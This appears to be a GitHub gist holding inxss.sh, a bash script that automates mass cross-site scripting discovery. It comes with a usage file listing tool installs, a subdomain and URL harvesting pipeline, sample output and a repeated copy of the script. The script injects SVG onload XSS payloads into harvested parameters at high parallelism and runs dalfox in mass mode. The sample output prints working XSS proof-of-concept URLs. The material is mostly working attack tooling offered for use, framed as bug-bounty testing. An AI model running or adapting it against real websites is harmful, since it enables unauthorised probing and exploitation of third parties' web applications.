R0X4R/inxss.sh

## inxss.sh
#!/bin/bash
#Requirements: KXSS(https://github.com/Emoe/kxss), Dalfox (https://github.com/hahwul/dalfox), QSreplace(https://github.com/tomnomnom/qsreplace)
#Preparation: subfinder -d target.tld -all -silent | httpx -silent | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o params.txt && cat params.txt | gf xss | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | qsreplace "FUZZ" 2> /dev/null | anew -q testparams.txt
#Usage: ./inxss.sh testparams.txt target.tld
lists=$1
mkout=$(echo -e "$2_$(date +%F_%H_%M_%S)")
mkdir -p $mkout
echo -e "Total $(cat $1 | wc -l) targets loaded"
sleep 6s
echo -e "[$(date +"%F %H:%M:%S")] Starting scan..."
SECONDS=0
xargs -a $1 -P 50 -I % bash -c "echo % | kxss" 2> /dev/null | grep -E "< >|\"" | anew -q $mkout/kxss.txt
cat $mkout/kxss.txt | grep -o '^.*Param' | sed 's/ Param\|URL\: //g' | anew -q $mkout/testdal.txt
cat $mkout/testdal.txt | qsreplace "\">/><svg/onload=confirm(document.domain)>" | xargs -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"<svg/onload=confirm(document.domain)>\" && echo -e \"[POTENTIAL XSS] - % \n \"" 2> /dev/null | grep "POTENTIAL XSS" | anew -q $mkout/manuxss.txt &> /dev/null
dalfox file $mkout/testdal.txt pipe --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null | anew -q $mkout/dalfox.txt &> /dev/null
DURATION=$SECONDS
rm -rf $mkout/testdal.txt
echo -e "Scan completed, total $(($DURATION / 60)) min and $(($DURATION % 60)) seconds taken"
exit 1

## usage.md

      
    Raw
  

              usage.md
            
          
    XSSIN

A fast xss detector script

#>Requirements

$ go get -u github.com/tomnomnom/qsreplace
$ go get github.com/tomnomnom/waybackurls
$ GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder
$ GO111MODULE=on go get -v github.com/projectdiscovery/httpx/cmd/httpx
$ GO111MODULE=on go get -u -v github.com/bp0lr/gauplus
$ go get -u github.com/tomnomnom/gf
$ go get -u github.com/tomnomnom/anew
$ GO111MODULE=on go get -v github.com/hahwul/dalfox/v2
$ go get github.com/Emoe/kxss
#>Preparation

$ subfinder -d target.tld -all -silent | httpx -silent | anew -q domains
$ cat domains | xargs -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q wayback.txt &> /dev/null
$ cat domains | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o gauplus.txt &> /dev/null
$ cat wayback.txt gauplus.txt | grep "target.tld" | sort -u | urldedupe -s | qsreplace "FUZZ" | gf xss | sed "s/'//g" | sed "s/(//g" | sed "s/)//g" | anew -q parameters &> /dev/null
#>Usage

$ chmod +x inxss.sh
$ ./inxss.sh parameters target.tld
#>Sample

usage:~ ./inxss.sh parameters target.tld

Total 350 targets loaded
[2021-07-17 15:13:16] Starting scan...
Scan completed, total 2 min and 17 seconds taken

usage:~ cd target.tld_2021-07-17_15_13_10/
usage/target.tld_2021-07-17_15_13_10:~ cat *

[POC][V][GET] http://target.tld:80/test/?p=FUZZ%22onpointerleave%3Dalert%281%29+class%3Ddalfox+
[POC][V][GET] http://target.tld:80/test/test.php?p=FUZZ%22%3E%3Cxmp%3E%3Cp+title%3D%22%3C%2Fxmp%3E%3Csvg%2Fonload%3Dalert%281%29+class%3Ddalfox%3E

URL: http://target.tld:80/test/?p=FUZZ Param: p Unfiltered: [" ' < >]
URL: http://target.tld:80/test/test.php?p=FUZZ Param: p Unfiltered: [" ' < >]

[POTENTIAL XSS] - http://target.tld:80/test/?p=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E
[POTENTIAL XSS] - http://target.tld:80/test/test.php?p=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E
	#!/bin/bash
	#Requirements: KXSS(https://github.com/Emoe/kxss), Dalfox (https://github.com/hahwul/dalfox), QSreplace(https://github.com/tomnomnom/qsreplace)
	#Preparation: subfinder -d target.tld -all -silent \| httpx -silent \| gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o params.txt && cat params.txt \| gf xss \| sed "s/'/ /g" \| sed "s/(/ /g" \| sed "s/)/ /g" \| qsreplace "FUZZ" 2> /dev/null \| anew -q testparams.txt
	#Usage: ./inxss.sh testparams.txt target.tld
	lists=$1
	mkout=$(echo -e "$2_$(date +%F_%H_%M_%S)")
	mkdir -p $mkout
	echo -e "Total $(cat $1 \| wc -l) targets loaded"
	sleep 6s
	echo -e "[$(date +"%F %H:%M:%S")] Starting scan..."
	SECONDS=0
	xargs -a $1 -P 50 -I % bash -c "echo % \| kxss" 2> /dev/null \| grep -E "< >\|\"" \| anew -q $mkout/kxss.txt
	cat $mkout/kxss.txt \| grep -o '^.*Param' \| sed 's/ Param\\|URL\: //g' \| anew -q $mkout/testdal.txt
	cat $mkout/testdal.txt \| qsreplace "\">/><svg/onload=confirm(document.domain)>" \| xargs -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' \| grep \"<svg/onload=confirm(document.domain)>\" && echo -e \"[POTENTIAL XSS] - % \n \"" 2> /dev/null \| grep "POTENTIAL XSS" \| anew -q $mkout/manuxss.txt &> /dev/null
	dalfox file $mkout/testdal.txt pipe --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null \| anew -q $mkout/dalfox.txt &> /dev/null
	DURATION=$SECONDS
	rm -rf $mkout/testdal.txt
	echo -e "Scan completed, total $(($DURATION / 60)) min and $(($DURATION % 60)) seconds taken"
	exit 1